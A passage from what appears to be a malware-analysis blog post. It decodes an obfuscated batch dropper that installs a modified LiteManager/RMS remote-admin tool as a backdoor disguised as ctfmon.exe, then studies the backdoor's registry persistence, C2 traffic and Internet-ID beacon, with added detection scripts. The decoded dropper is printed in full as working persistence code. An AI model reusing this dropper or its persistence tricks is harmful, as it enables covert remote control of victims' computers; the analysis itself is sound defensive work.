%lpQmnLQ%%RCRUDqE%tCgoVQ%yFcQKpJyG%+ %lpQmnLQ%%RCRUDqE%KbJyRFMVu%yFcQKpJyG%( %lpQmnLQ%%RCRUDqE%yOmTK%yFcQKpJyG%B %lpQmnLQ%%RCRUDqE%DGHR%yFcQKpJyG%8 %lpQmnLQ%%RCRUDqE%LKQhkKSem%yFcQKpJyG%s %lpQmnLQ%%RCRUDqE%UtIjaUOl%yFcQKpJyG%X %lpQmnLQ%%RCRUDqE%KYddI%yFcQKpJyG%A %lpQmnLQ%%RCRUDqE%TMuVQ%yFcQKpJyG%4 %lpQmnLQ%%RCRUDqE%dAMOY%yFcQKpJyG%) %lpQmnLQ%%RCRUDqE%vpVg%yFcQKpJyG%_ %lpQmnLQ%%RCRUDqE%aeVO%yFcQKpJyG%J %lpQmnLQ%%RCRUDqE%YrtVU%yFcQKpJyG%b %lpQmnLQ%%RCRUDqE%vANLWtdW%yFcQKpJyG%d %lpQmnLQ%%RCRUDqE%tNqAVXbz%yFcQKpJyG%m %lpQmnLQ%%RCRUDqE%LkyqXKNYc%yFcQKpJyG%e %lpQmnLQ%%RCRUDqE%ltuAgKR%yFcQKpJyG%w %lpQmnLQ%%RCRUDqE%GNbpPXWvQ%yFcQKpJyG%a %lpQmnLQ%%RCRUDqE%QBmzz%yFcQKpJyG%i %lpQmnLQ%%RCRUDqE%pNywcj%yFcQKpJyG%C %lpQmnLQ%%RCRUDqE%sQrHzBN%yFcQKpJyG%v %lpQmnLQ%%RCRUDqE%DCbQQGfkL%yFcQKpJyG%2 %lpQmnLQ%%RCRUDqE%zUwuD%yFcQKpJyG%z %lpQmnLQ%%RCRUDqE%abWkRpti%yFcQKpJyG%S %lpQmnLQ%%RCRUDqE%mPVfEbE%yFcQKpJyG%r %lpQmnLQ%%RCRUDqE%sIluXDQS%yFcQKpJyG%7 %lpQmnLQ%%RCRUDqE%OWatTKvD%yFcQKpJyG%x %lpQmnLQ%%RCRUDqE%krFh%yFcQKpJyG%5 %lpQmnLQ%%RCRUDqE%UdGiq%yFcQKpJyG%T %lpQmnLQ%%RCRUDqE%kHci%yFcQKpJyG%] %lpQmnLQ%%RCRUDqE%pVCdLFa%yFcQKpJyG%, 
%lpQmnLQ%%RCRUDqE%nmvE%yFcQKpJyG%j %lpQmnLQ%%RCRUDqE%zHzGVcDcY%yFcQKpJyG%k %lpQmnLQ%%RCRUDqE%GAJoRj%yFcQKpJyG%n %lpQmnLQ%%RCRUDqE%DNmdQ%yFcQKpJyG%q %lpQmnLQ%%RCRUDqE%oAndDQK%yFcQKpJyG%L %lpQmnLQ%%RCRUDqE%lSBY%yFcQKpJyG%O %lpQmnLQ%%RCRUDqE%JcERxC%yFcQKpJyG%h %lpQmnLQ%%RCRUDqE%pcEihxAuJ%yFcQKpJyG%I %lpQmnLQ%%RCRUDqE%shHyBbWt%yFcQKpJyG%. %lpQmnLQ%%RCRUDqE%KAFkG%yFcQKpJyG%- %lpQmnLQ%%RCRUDqE%AdQY%yFcQKpJyG%t %lpQmnLQ%%RCRUDqE%pIxi%yFcQKpJyG%Y %lpQmnLQ%%RCRUDqE%TKaBbO%yFcQKpJyG%1 %lpQmnLQ%%RCRUDqE%pCQWd%yFcQKpJyG%F %lpQmnLQ%%RCRUDqE%gEuKD%yFcQKpJyG%V %lpQmnLQ%%RCRUDqE%ulmeh%yFcQKpJyG%9 %lpQmnLQ%%RCRUDqE%nFjJmCQ%yFcQKpJyG%N %lpQmnLQ%%RCRUDqE%hdvdM%yFcQKpJyG%W %lpQmnLQ%%RCRUDqE%jgpoj%yFcQKpJyG%" %lpQmnLQ%%RCRUDqE%xMhHMK%yFcQKpJyG%6 %lpQmnLQ%%RCRUDqE%aOOInC%yFcQKpJyG%3 %lpQmnLQ%%RCRUDqE%GLznBQ%yFcQKpJyG%U %lpQmnLQ%%RCRUDqE%oFHOxG%yFcQKpJyG%g %lpQmnLQ%%RCRUDqE%KudP%yFcQKpJyG%{ %lpQmnLQ%%RCRUDqE%QSrCDDA%yFcQKpJyG%$ %lpQmnLQ%%RCRUDqE%XLAkzKtxq%yFcQKpJyG%* %lpQmnLQ%%RCRUDqE%opQB%yFcQKpJyG%Z %lpQmnLQ%%RCRUDqE%wjTBiTbn%yFcQKpJyG%\ %lpQmnLQ%%RCRUDqE%XnXWCNDJO%yFcQKpJyG%! %lpQmnLQ%%RCRUDqE%fjxrTBqkC%yFcQKpJyG%p %lpQmnLQ%%RCRUDqE%DuPVUEGE%yFcQKpJyG%D %lpQmnLQ%%RCRUDqE%mnCdWrg%yFcQKpJyG%? 
%lpQmnLQ%%RCRUDqE%DYBqxQkr%yFcQKpJyG%P %AdQY%%GNbpPXWvQ%%LKQhkKSem%%zHzGVcDcY%%ScSLQo%%QBmzz%%LKQhkKSem%%AdQY%%RCRUDqE%|%RCRUDqE%%qlLeeJ%%QBmzz%%GAJoRj%%vANLWtdW%%RCRUDqE%%jgpoj%%KYddI%%sQrHzBN%%GNbpPXWvQ%%LKQhkKSem%%AdQY%%GLznBQ%%pcEihxAuJ%%shHyBbWt%%LkyqXKNYc%%OWatTKvD%%LkyqXKNYc%%jgpoj% %QBmzz%%qlLeeJ%%RCRUDqE%%LkyqXKNYc%%mPVfEbE%%mPVfEbE%%toTUt%%mPVfEbE%%ScSLQo%%LkyqXKNYc%%sQrHzBN%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%TKaBbO%%RCRUDqE%%oFHOxG%%toTUt%%AdQY%%toTUt%%RCRUDqE%%nFjJmCQ%%toTUt%%MKbjyO%%LkyqXKNYc%%immQQhH%%toTUt%%mPVfEbE%%vANLWtdW% %immQQhH%%vANLWtdW%%RCRUDqE%%jgpoj%%appData%%wjTBiTbn%%hmixayLOL%%QBmzz%%immQQhH%%mPVfEbE%%toTUt%%immQQhH%%toTUt%%qlLeeJ%%AdQY%%GLznBQ%%fjxrTBqkC%%vANLWtdW%%GNbpPXWvQ%%AdQY%%LkyqXKNYc%%wjTBiTbn%%jgpoj% %vANLWtdW%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%LKQhkKSem%%LkyqXKNYc%%GAJoRj%%vANLWtdW%%toTUt%%zHzGVcDcY%%shHyBbWt%%AdQY%%OWatTKvD%%AdQY% %vANLWtdW%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%fjxrTBqkC%%toTUt%%QBmzz%%shHyBbWt%%LkyqXKNYc%%OWatTKvD%%LkyqXKNYc% %kOXeOOyR%%tNqAVXbz%%LKQhkKSem%%JcERxC%%AdQY%%GNbpPXWvQ%%RCRUDqE%%sQrHzBN%%YrtVU%%LKQhkKSem%%immQQhH%%mPVfEbE%%QBmzz%%fjxrTBqkC%%AdQY%%NSQCAVz%%QvBGN%%OWatTKvD%%LkyqXKNYc%%immQQhH%%MuOksUDd%%AdQY%%LkyqXKNYc%%KbJyRFMVu%%jgpoj%%abWkRpti%%LkyqXKNYc%%AdQY%%RCRUDqE%%OWatTKvD%%yFcQKpJyG%%pNywcj%%mPVfEbE%%LkyqXKNYc%%GNbpPXWvQ%%AdQY%%LkyqXKNYc%%lSBY%%YrtVU%%nmvE%%LkyqXKNYc%%immQQhH%%AdQY%%KbJyRFMVu%%jgpoj%%jgpoj%%hdvdM%%abWkRpti%%immQQhH%%mPVfEbE%%QBmzz%%fjxrTBqkC%%AdQY%%shHyBbWt%%abWkRpti%%JcERxC%%LkyqXKNYc%%ScSLQo%%ScSLQo%%jgpoj%%jgpoj%%dAMOY%%NSQCAVz%%abWkRpti%%LkyqXKNYc%%AdQY%%RCRUDqE%%mOMhgb%%yFcQKpJyG%%OWatTKvD%%shHyBbWt%%pNywcj%%mPVfEbE%%LkyqXKNYc%%GNbpPXWvQ%%AdQY%%LkyqXKNYc%%abWkRpti%%JcERxC%%toTUt%%mPVfEbE%%AdQY%%immQQhH%%MuOksUDd%%AdQY%%KbJyRFMVu%%OWatTKvD%%shHyBbWt%%abWkRpti%%fjxrTBqkC%%LkyqXKNYc%%immQQhH%%QBmzz%%GNbpPXWvQ%%ScSLQo%%pCQWd%%toTUt%%ScSLQo%%vANLWtdW%%LkyqXKNYc%%mPVfEbE%%LKQhkKSem%%KbJyRFMVu%%jgpoj%%jgpoj%%abWkRpti%%AdQY%%GNbpPXWvQ%%mPVfEbE%%AdQY%%MuOksUDd%%fjxrTBqkC%%jgpoj%%jgpoj%%dAMOY%%tCg
oVQ%%jgpoj%%jgpoj%%wjTBiTbn%%hdvdM%%QBmzz%%GAJoRj%%GLznBQ%%fjxrTBqkC%%vANLWtdW%%GNbpPXWvQ%%AdQY%%LkyqXKNYc%%shHyBbWt%%ScSLQo%%GAJoRj%%zHzGVcDcY%%jgpoj%%jgpoj%%dAMOY%%NSQCAVz%%mOMhgb%%shHyBbWt%%UdGiq%%GNbpPXWvQ%%mPVfEbE%%oFHOxG%%LkyqXKNYc%%AdQY%%DYBqxQkr%%GNbpPXWvQ%%AdQY%%JcERxC%%yFcQKpJyG%%jgpoj%%jgpoj%%~dp0ctfmon.exe"":y.Save():Close()") %vANLWtdW%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%0%RCRUDqE%>%RCRUDqE%%GAJoRj%%MuOksUDd%%ScSLQo% %oFHOxG%%toTUt%%AdQY%%toTUt%%RCRUDqE%%DuPVUEGE%%toTUt%%GAJoRj%%LkyqXKNYc% :NoRecord %mPVfEbE%%LkyqXKNYc%%oFHOxG%%RCRUDqE%%GNbpPXWvQ%%vANLWtdW%%vANLWtdW%%RCRUDqE%%jgpoj%%upeuMhJ%%NjHP%%QvBGN%%pIxi%%vpVg%%pNywcj%%GLznBQ%%MKbjyO%%MKbjyO%%QvBGN%%nFjJmCQ%%UdGiq%%vpVg%%GLznBQ%%abWkRpti%%QvBGN%%MKbjyO%%wjTBiTbn%%abWkRpti%%toTUt%%qlLeeJ%%AdQY%%ltuAgKR%%GNbpPXWvQ%%mPVfEbE%%LkyqXKNYc%%wjTBiTbn%%hmixayLOL%%QBmzz%%immQQhH%%mPVfEbE%%toTUt%%LKQhkKSem%%toTUt%%qlLeeJ%%AdQY%%wjTBiTbn%%hdvdM%%QBmzz%%GAJoRj%%vANLWtdW%%toTUt%%ltuAgKR%%LKQhkKSem%%RCRUDqE%%nFjJmCQ%%UdGiq%%wjTBiTbn%%pNywcj%%MuOksUDd%%mPVfEbE%%mPVfEbE%%LkyqXKNYc%%GAJoRj%%AdQY%%gEuKD%%LkyqXKNYc%%mPVfEbE%%LKQhkKSem%%QBmzz%%toTUt%%GAJoRj%%wjTBiTbn%%hdvdM%%QBmzz%%GAJoRj%%ScSLQo%%toTUt%%oFHOxG%%toTUt%%GAJoRj%%jgpoj%%RCRUDqE%%mRMLJkAp%%sQrHzBN%%RCRUDqE%%jgpoj%%abWkRpti%%JcERxC%%LkyqXKNYc%%ScSLQo%%ScSLQo%%jgpoj%%RCRUDqE%%mRMLJkAp%%AdQY%%RCRUDqE%%MKbjyO%%QvBGN%%SAKEFniaY%%vpVg%%abWkRpti%%opQB%%RCRUDqE%%mRMLJkAp%%vANLWtdW%%RCRUDqE%%jgpoj%%appData%%wjTBiTbn%%hmixayLOL%%QBmzz%%immQQhH%%mPVfEbE%%toTUt%%immQQhH%%toTUt%%qlLeeJ%%AdQY%%GLznBQ%%fjxrTBqkC%%vANLWtdW%%GNbpPXWvQ%%AdQY%%LkyqXKNYc%%wjTBiTbn%%immQQhH%%AdQY%%qlLeeJ%%tNqAVXbz%%toTUt%%GAJoRj%%shHyBbWt%%LkyqXKNYc%%OWatTKvD%%LkyqXKNYc%%RCRUDqE%%pVCdLFa%%RCRUDqE%%LkyqXKNYc%%OWatTKvD%%fjxrTBqkC%%ScSLQo%%toTUt%%mPVfEbE%%LkyqXKNYc%%mPVfEbE%%shHyBbWt%%LkyqXKNYc%%OWatTKvD%%LkyqXKNYc%%jgpoj%%RCRUDqE%%RCRUDqE%%mRMLJkAp%%qlLeeJ% 
%immQQhH%%vANLWtdW%%RCRUDqE%%jgpoj%%appData%%wjTBiTbn%%hmixayLOL%%QBmzz%%immQQhH%%mPVfEbE%%toTUt%%immQQhH%%toTUt%%qlLeeJ%%AdQY%%GLznBQ%%fjxrTBqkC%%vANLWtdW%%GNbpPXWvQ%%AdQY%%LkyqXKNYc%%wjTBiTbn%%jgpoj% %vANLWtdW%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%LKQhkKSem%%LkyqXKNYc%%GAJoRj%%vANLWtdW%%toTUt%%zHzGVcDcY%%shHyBbWt%%AdQY%%OWatTKvD%%AdQY% %vANLWtdW%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%fjxrTBqkC%%toTUt%%QBmzz%%shHyBbWt%%LkyqXKNYc%%OWatTKvD%%LkyqXKNYc% %LKQhkKSem%%AdQY%%GNbpPXWvQ%%mPVfEbE%%AdQY%%RCRUDqE%%immQQhH%%AdQY%%qlLeeJ%%tNqAVXbz%%toTUt%%GAJoRj%%shHyBbWt%%LkyqXKNYc%%OWatTKvD%%LkyqXKNYc% %vANLWtdW%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%0%RCRUDqE%>%RCRUDqE%%GAJoRj%%MuOksUDd%%ScSLQo% :Done 


Laziness got the better of me again, so this time I did not bother with the editors but asked a friend to write a program in C#, which he did. My bow to him for that!

After decoding, this bat-file emerged:
 tasklist | find "AvastUI.exe"
 if errorlevel 1 goto NoRecord
 cd "%appData%\MicrocoftUpdate\"
 del sendok.txt
 del poi.exe
 @mshta vbscript:Execute("Set x=CreateObject(""WScript.Shell""):Set y=x.CreateShortcut(x.SpecialFolders(""Startup"")+""\WinUpdate.lnk""):y.TargetPath=""%~dp0ctfmon.exe"":y.Save():Close()")
 del %0 > nul
 goto Done
 :NoRecord
 reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "%appData%\MicrocoftUpdate\ctfmon.exe , explorer.exe" /f
 cd "%appData%\MicrocoftUpdate\"
 del sendok.txt
 del poi.exe
 start ctfmon.exe
 del %0 > nul
 :Done

Here is what happens: the script checks whether Avast Antivirus is running. If it is, the script goes to the folder "%appData%\MicrocoftUpdate\", deletes the files sendok.txt and poi.exe from it, creates a shortcut to ctfmon.exe in the system Startup folder and self-destructs; in this case ctfmon.exe will be launched at the next restart of the computer. If Avast is not found, then in the registry, under "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon", the value of "Shell" is replaced with "%appData%\MicrocoftUpdate\ctfmon.exe , explorer.exe"; after that the script again goes to "%appData%\MicrocoftUpdate\", deletes sendok.txt and poi.exe, starts ctfmon.exe and deletes itself. Thus ctfmon.exe will be started whenever the shell (Windows Explorer) is started.

That's it, the horse has done its dirty work: a backdoor has been installed in the system. Now let's look at the hero of the occasion, the file ctfmon.exe.

Part Four: Backdoor Study


The backdoor was examined from the outside, using Process Monitor and Wireshark.

First, let's look at the properties of the exe-file:

 [screenshot: ctfmon.exe file properties]

Then we go through the Process Monitor log in search of the word "Microcoft". To do this, add the following rule to the filter:

 [screenshot: Process Monitor filter rule for "Microcoft"]
And what do we see? We see that ctfmon.exe creates a very interesting key in the registry:
 HKCU\Software\LiteManagerTeam\LiteManager\v3.4\Config\ServerExe
and writes its own path, its beloved self, into this key. From this I make the assumption that I am dealing with the LiteManager program. I go to the LiteManager website and download the distribution for Windows. Note the version: 4.7.2; doesn't that remind you of anything? I unpack the distribution and pull the server file out of it: romserver.exe. I open a window with its properties:

 [screenshot: romserver.exe file properties next to those of ctfmon.exe]
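The persistence described above (the Winlogon "Shell" value, the .lnk dropped into the Startup folder, the ServerExe key and the misspelled "MicrocoftUpdate" folder) is exactly the kind of thing one wants to pull out of a Process Monitor log automatically rather than by eye. The script below is an added example, not part of the original post: it reads a Process Monitor CSV export (the default columns), and flags a Winlogon Shell value other than plain explorer.exe, any new .lnk in a user's Startup folder, writes to the LiteManager configuration key seen here, and path components that are one edit away from a vendor name such as Microsoft without actually being it. The CSV rows are constructed to mirror the events on the page; the process names, PIDs and lengths in them are made up.

```python
import csv
import io
import re

# Constructed Process Monitor CSV export (same columns as a real one). The
# events mirror what reg.exe, mshta.exe and ctfmon.exe did on the page;
# PIDs and lengths are invented.
SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:12:01.0000001","reg.exe","4120","RegSetValue","HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","SUCCESS","Type: REG_SZ, Length: 142, Data: C:\Users\dima\AppData\Roaming\MicrocoftUpdate\ctfmon.exe , explorer.exe"
"10:12:02.0000001","ctfmon.exe","1234","RegSetValue","HKCU\Software\LiteManagerTeam\LiteManager\v3.4\Config\ServerExe","SUCCESS","Type: REG_SZ, Length: 114, Data: C:\Users\dima\AppData\Roaming\MicrocoftUpdate\ctfmon.exe"
"10:12:03.0000001","mshta.exe","2345","CreateFile","C:\Users\dima\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinUpdate.lnk","SUCCESS","Desired Access: Generic Write"
"10:12:04.0000001","explorer.exe","900","RegQueryValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","SUCCESS","Type: REG_DWORD, Length: 4, Data: 1"
"10:12:05.0000001","explorer.exe","900","CreateFile","C:\Users\dima\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini","SUCCESS","Desired Access: Read Attributes"
'''

LOOKALIKE_TARGETS = ("microsoft", "windows")
# Registry paths of remote-admin tools seen in this investigation; extend as needed.
RAT_KEY_MARKERS = ("\\litemanagerteam\\",)


def edit_distance(a, b):
    """Plain Levenshtein distance, no external dependency."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_components(text):
    """Path components whose start is one edit away from a well-known vendor
    name (MicrocoftUpdate vs. Microsoft) without actually beginning with it."""
    hits = []
    for comp in re.split(r"[\\/]", text):
        low = comp.lower()
        for target in LOOKALIKE_TARGETS:
            if len(low) < len(target) or low.startswith(target):
                continue
            if edit_distance(low[: len(target)], target) == 1:
                hits.append(comp)
    return hits


def scan_procmon_csv(text):
    """One finding per (event, rule): a non-default Winlogon Shell, a new .lnk
    in a Startup folder, a remote-admin tool's config key, look-alike folders."""
    findings = []
    for n, row in enumerate(csv.DictReader(io.StringIO(text)), 1):
        op, path, detail = row["Operation"], row["Path"], row["Detail"]
        low = path.lower()
        m = re.search(r"Data: (.*)$", detail)
        data = m.group(1).strip() if m else ""
        rules = []
        if op == "RegSetValue" and low.endswith("\\winlogon\\shell") and data.lower() != "explorer.exe":
            rules.append(("winlogon-shell", data))
        if op == "RegSetValue" and any(mk in low for mk in RAT_KEY_MARKERS):
            rules.append(("rat-config-key", data))
        if op in ("CreateFile", "WriteFile") and "\\start menu\\programs\\startup\\" in low and low.endswith(".lnk"):
            rules.append(("startup-shortcut", path.rsplit("\\", 1)[-1]))
        # Look at the value being written as well, since the path lives in Detail for registry events.
        rules += [("lookalike-path", c) for c in lookalike_components(path + "\\" + detail)]
        for rule, note in rules:
            findings.append({"line": n, "rule": rule, "process": row["Process Name"],
                             "path": path, "note": note})
    return findings


if __name__ == "__main__":
    for f in scan_procmon_csv(SAMPLE_CSV):
        print(f"{f['rule']:18} {f['process']:14} {f['note']}")
```

On the sample the benign RegQueryValue and the desktop.ini write produce nothing, while the five real findings point at the same two places the author found by hand: the Winlogon key and the folder with the 'c' in it. The Winlogon rule compares against plain "explorer.exe" because that is the default value; a value with anything else prepended, like the one test.bat writes, is worth a look regardless of which file it names.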
Yes, it is very similar: the same icon, the same versions; only the size differs slightly, and the original has a digital signature. Obviously the file had been "reworked with a file", because in its original form it did not quite suit the villains. Perhaps it somehow showed its presence in the system, which was completely superfluous. However, the fact that the file was modified does not bother the antiviruses at all: on Virustotal most of them are simply silent, and only a few say it is just RiskWare.

We continue. Now I will study the Wireshark log.

First of all, ctfmon.exe connects to the address 91.240.86.200. Several short messages run back and forth through the established channel, after which ctfmon.exe receives this packet:
 <?xml version="1.0" encoding="UTF-16"?>
 <rom_sever_client_settings version="4722">
   <id>180185</id>
   <internal_id>9017511</internal_id>
   <noip_number>-1</noip_number>
   <license>false</license>
   <host></host>
   <port>5650</port>
   <redirected>false</redirected>
   <server_ver>4722</server_ver>
   <remotehideserverresub>false</remotehideserverresub>
   <connectid>1195251490</connectid>
   <protect_code>0</protect_code>
 </rom_sever_client_settings>

This looks like registration on one of the main LiteManager servers.
Then, for some time, there is again an exchange of short messages, followed by another packet:
 <?xml version="1.0" encoding="UTF-16"?>
 <rom_noip_client_settings version="4725">
   <host>83.240.218.170</host>
   <port>5651</port>
   <max_connections>30</max_connections>
   <cur_connections>0</cur_connections>
   <ip_filter>false</ip_filter>
   <id_filter>false</id_filter>
   <mac_filter>false</mac_filter>
   <caption></caption>
   <description></description>
   <no_ip_type>1</no_ip_type>
   <license>1</license>
   <number>409</number>
   <internalID>2801665</internalID>
   <NoIPSelf>false</NoIPSelf>
   <ver>4724</ver>
 </rom_noip_client_settings>

This is more interesting. The thing is, the LiteManager client can connect to the server not directly but through a third node, the so-called NoIPServer. The need for this may arise if the server is hidden from the Internet behind firewalls, NATs and the like. For villains, such a third node is a great way to anonymize themselves: it hides the client's IP from prying eyes. This packet contains precisely the instructions to the server about what to do next (the address and port of the NoIPServer).
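Both packets are cleartext XML, so the relay address and the Internet-ID that the backdoor is told to use can be pulled straight out of a capture. The following script is an added example, not part of the original post: it carves every UTF-16 XML document out of a raw TCP payload (a constructed byte string that interleaves the two documents shown above with short binary messages), parses each one, and reduces it to an IoC record. The element names are the ones on the page; the "kind" labels and the surrounding binary bytes are my own.

```python
import re
import xml.etree.ElementTree as ET

# The two settings documents from the capture above, verbatim.
REGISTRATION_XML = """<?xml version="1.0" encoding="UTF-16"?>
<rom_sever_client_settings version="4722">
<id>180185</id>
<internal_id>9017511</internal_id>
<noip_number>-1</noip_number>
<license>false</license>
<host></host>
<port>5650</port>
<redirected>false</redirected>
<server_ver>4722</server_ver>
<remotehideserverresub>false</remotehideserverresub>
<connectid>1195251490</connectid>
<protect_code>0</protect_code>
</rom_sever_client_settings>"""

NOIP_XML = """<?xml version="1.0" encoding="UTF-16"?>
<rom_noip_client_settings version="4725">
<host>83.240.218.170</host>
<port>5651</port>
<max_connections>30</max_connections>
<cur_connections>0</cur_connections>
<ip_filter>false</ip_filter>
<id_filter>false</id_filter>
<mac_filter>false</mac_filter>
<caption></caption>
<description></description>
<no_ip_type>1</no_ip_type>
<license>1</license>
<number>409</number>
<internalID>2801665</internalID>
<NoIPSelf>false</NoIPSelf>
<ver>4724</ver>
</rom_noip_client_settings>"""


def _wire(text):
    """Constructed wire form of a UTF-16 XML blob: BOM followed by UTF-16LE."""
    return b"\xff\xfe" + text.encode("utf-16-le")


# Constructed payload: short binary messages interleaved with the two documents.
SAMPLE_STREAM = (b"\x05\x00\x00\x00hello" + _wire(REGISTRATION_XML)
                 + b"\x01\x00ok" + _wire(NOIP_XML))

XML_START = "<?xml".encode("utf-16-le")


def carve_xml(stream):
    """Yield every UTF-16LE XML document embedded in a raw TCP payload."""
    pos = 0
    while True:
        start = stream.find(XML_START, pos)
        if start < 0:
            return
        # The root element name follows the declaration; its closing tag ends the document.
        head = stream[start:start + 400].decode("utf-16-le", errors="replace")
        m = re.search(r"\?>\s*<([A-Za-z_][\w.-]*)", head)
        if not m:
            pos = start + 2
            continue
        closing = f"</{m.group(1)}>".encode("utf-16-le")
        end = stream.find(closing, start)
        if end < 0:
            return
        end += len(closing)
        yield stream[start:end].decode("utf-16-le")
        pos = end


def extract_iocs(xml_text):
    """Flatten one decoded settings document into an IoC record."""
    body = re.sub(r"^<\?xml[^>]*\?>\s*", "", xml_text)   # encoding already handled above
    root = ET.fromstring(body)
    fields = {child.tag: (child.text or "").strip() for child in root}
    if root.tag == "rom_sever_client_settings":
        return {"kind": "id-server registration", "internet_id": fields.get("id"),
                "port": fields.get("port"), "version": root.get("version")}
    if root.tag == "rom_noip_client_settings":
        return {"kind": "noip relay", "host": fields.get("host"),
                "port": fields.get("port"), "max_connections": fields.get("max_connections")}
    return {"kind": "unknown", "tag": root.tag}


def iocs_from_stream(stream):
    return [extract_iocs(doc) for doc in carve_xml(stream)]


if __name__ == "__main__":
    for rec in iocs_from_stream(SAMPLE_STREAM):
        print(rec)
```

The carver keys on the UTF-16 form of `<?xml` rather than decoding the whole stream, because the binary messages around the documents are not valid UTF-16; the second record is the one that matters for blocking, since it names the relay host and port the backdoor will connect to next.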

Let's look further. Here the fun begins! Immediately after receiving this packet, ctfmon.exe sends the following POST request to the address https://rmansys.ru/utils/inet_id_notify.php:
----------162747236742480
Content-Disposition: form-data; name="email"
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: binary

blackcc019@gmail.com
----------162747236742480
Content-Disposition: form-data; name="user_name"
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: binary

Dima
----------162747236742480
Content-Disposition: form-data; name="comp_name"
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: binary

DIMA-
----------162747236742480
Content-Disposition: form-data; name="id"
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: binary

180185
----------162747236742480
Content-Disposition: form-data; name="lang_id"
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: binary

1049
----------162747236742480
Content-Disposition: form-data; name="product"
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: binary

RMS
----------162747236742480--

What does this look like? It looks as though, via the inet_id_notify.php script, ctfmon sends the settings for connecting to the infected computer to its master at the email address blackcc019@gmail.com.
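To turn the two artefacts above (the rom_noip_client_settings packet and the multipart body of the inet_id_notify.php request) into something a SOC can act on, here is an added example: my own code, not from the post and not LiteManager's or TektonIT's. It parses both into one indicator record. The sample inputs are reconstructed from the values quoted above (the packet is UTF-16 on the wire, so it is fed to the parser as UTF-16 bytes); the function names are mine.

```python
"""Parse the two artefacts seen in the capture into one indicator record:
the rom_noip_client_settings XML packet (NoIP relay address) and the
multipart/form-data body ctfmon.exe POSTed to inet_id_notify.php."""
import email
import xml.etree.ElementTree as ET

# Constructed sample: the NoIP packet as quoted in the write-up (fields
# trimmed to the ones used here). Encoded to UTF-16 before parsing.
NOIP_PACKET = (
    '<?xml version="1.0" encoding="UTF-16"?>'
    '<rom_noip_client_settings version="4725">'
    "<host>83.240.218.170</host><port>5651</port>"
    "<max_connections>30</max_connections><cur_connections>0</cur_connections>"
    "<no_ip_type>1</no_ip_type><license>1</license><number>409</number>"
    "</rom_noip_client_settings>"
)

# Constructed sample: the POST body rebuilt from the fields quoted above.
BOUNDARY = "--------162747236742480"   # the body's delimiter is "--" + this


def _form_part(name, value):
    return (f"--{BOUNDARY}\r\n"
            f'Content-Disposition: form-data; name="{name}"\r\n'
            'Content-Type: text/html; charset="UTF-8"\r\n'
            "Content-Transfer-Encoding: binary\r\n\r\n"
            f"{value}\r\n")


FORM_BODY = ("".join(_form_part(n, v) for n, v in [
    ("email", "blackcc019@gmail.com"), ("user_name", "Dima"),
    ("comp_name", "DIMA-"), ("id", "180185"),
    ("lang_id", "1049"), ("product", "RMS")])
    + f"--{BOUNDARY}--\r\n").encode("utf-8")


def parse_form_data(body, boundary):
    """Return {field name: value} for a multipart/form-data body.

    The stdlib email parser understands MIME multipart once it knows the
    boundary, so a synthetic Content-Type header is prepended to the body."""
    header = f'Content-Type: multipart/form-data; boundary="{boundary}"\r\n\r\n'
    msg = email.message_from_bytes(header.encode("ascii") + body)
    fields = {}
    for part in msg.walk():
        name = part.get_param("name", header="content-disposition")
        if name is None:          # the outer multipart container itself
            continue
        fields[name] = part.get_payload(decode=True).decode("utf-8").strip()
    return fields


def parse_noip_packet(packet_bytes):
    """Return (host, port) from a rom_noip_client_settings packet."""
    root = ET.fromstring(packet_bytes)
    if root.tag != "rom_noip_client_settings":
        raise ValueError(f"not a NoIP settings packet: <{root.tag}>")
    return root.findtext("host"), int(root.findtext("port"))


def summarize_beacon(form_body, boundary, noip_packet_bytes):
    """Combine both artefacts into the record worth keeping as an indicator."""
    fields = parse_form_data(form_body, boundary)
    host, port = parse_noip_packet(noip_packet_bytes)
    return {
        "operator_email": fields.get("email"),   # where the Internet-ID is mailed
        "internet_id": fields.get("id"),
        "victim_user": fields.get("user_name"),
        "victim_host": fields.get("comp_name"),
        "product": fields.get("product"),
        "noip_server": f"{host}:{port}",          # relay the backdoor connects to
    }


if __name__ == "__main__":
    record = summarize_beacon(FORM_BODY, BOUNDARY, NOIP_PACKET.encode("utf-16"))
    for key, value in record.items():
        print(f"{key:15} {value}")
```

On a real capture, feed parse_form_data the raw request body and the boundary from the request's Content-Type header; the "operator_email" field is the one to alert on, since a legitimate RMS installation would name an address the organisation recognises.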

To test this hypothesis, I sent a similar request from my Debian server:
 curl --data "email=_&user_name=user1&comp_name=pc1&id=12345&lang_id=1049&product=RMS" http://rmansys.ru/utils/inet_id_notify.php 

Checking mail - voila!
Received a letter from TektonIT Corp. <info@tektonit.com>
Email subject: 'Remote Manipulator System installed on remote computer, new Internet-ID received: 12345'
Email text:
 , Remote Manipulator System, "Internet-ID".
 ID: 12345
 : user1
 : pc1
 : http://rmansys.ru/
 : support@tektonit.com
 TektonIT Corp.

Everything is clear. The gentlemen at rmansys.ru have given hackers a great opportunity to get the information they need through what amounts to an open mail relay. Well done, nothing more to say. Then ctfmon.exe, as instructed, connects to the computer at 83.240.218.170:5651 and from time to time exchanges short messages with it, waiting for its master to connect. There was no particular point in observing further: the behaviour is clear.

